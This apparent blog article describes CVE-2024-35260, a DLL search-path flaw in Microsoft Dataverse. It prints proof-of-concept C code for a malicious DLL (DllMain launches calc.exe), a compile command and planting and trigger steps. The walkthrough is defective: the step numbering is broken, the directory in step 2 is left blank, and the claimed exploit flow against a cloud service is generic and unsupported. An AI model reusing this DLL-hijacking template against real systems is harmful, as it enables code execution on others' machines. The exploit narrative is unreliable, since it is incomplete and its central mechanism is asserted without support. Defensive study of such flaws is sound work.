CVE-2024-35260 - Exploiting Microsoft Dataverse’s Untrusted Search Path Vulnerability for Remote Code Execution

CVE-2024-35260 is a newly disclosed vulnerability affecting Microsoft Dataverse—a key data platform used in Microsoft Power Platform and various Dynamics 365 applications. This vulnerability uses an *Untrusted Search Path* flaw, allowing an authenticated attacker to execute malicious code across a network. This article breaks down the issue in simple language, demonstrates how the exploit works, and gives you an exclusive guide on real-world risks and mitigations.

What Is the Vulnerability?

The issue boils down to how Microsoft Dataverse loads dynamic-link libraries (DLLs). It doesn’t sufficiently verify the location of DLLs it loads at runtime—a classic untrusted search path problem. Attackers can trick Dataverse into running their specially crafted code by placing a malicious DLL in a location that Dataverse searches before the legitimate file.

Why Does This Matter?

- Code Execution: An attacker with basic authentication can run any code in the context of the Dataverse service.
- Privilege Escalation: With the right setup, this could lead to compromise of sensitive user data or further movement inside a network.
- Remote Attack Surface: The exploit can work over a network, making this a high-value avenue for attackers who have access.

Real-World Exploit Scenario

Imagine a Power Platform environment where a user has legitimate access but limited permissions. Using CVE-2024-35260, this attacker can do the following:

Upload a Malicious DLL to a shared network location (or their own workspace).

2. Trigger Dataverse to load the DLL via a normal function (like importing data or invoking a custom connector).

Sample Exploit Flow (Code Included)

Below’s a simplified walkthrough. This isn’t intended for malicious use, but to educate defenders.

Save this as evil.c—it pops up a calculator (or can do anything else)

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        WinExec("calc.exe", SW_SHOW);
    }
    return TRUE;
}

Compile with

cl evil.c /LD /Feevil.dll

2. Place the Malicious DLL in Attacker-Controlled Path

Suppose Dataverse expects a DLL (e.g., foo.dll) when working on a connector. Place evil.dll in the directory that gets searched first, such as:

3. Trigger Dataverse to Load the DLL

By initiating a Dataverse process (like importing a dataset), Dataverse will load the first foo.dll it finds. If your path is searched before the legitimate DLL—your code runs.

References (Original Sources)

- Microsoft Security Update Guide - CVE-2024-35260
- Untrusted Search Path (CWE-426)
- Microsoft Dataverse Overview (Official Docs)

Closing Thoughts

CVE-2024-35260 is a stark reminder that even cloud services can harbor vulnerabilities seen in classic Windows software. While only authenticated attackers can exploit this, the prevalence of Dataverse in business applications means the risk is real and urgent. Always patch promptly and review your cloud app permissions.

Timeline

Published on: 06/27/2024 18:15:18 UTC
Last modified on: 08/02/2024 03:15:50 UTC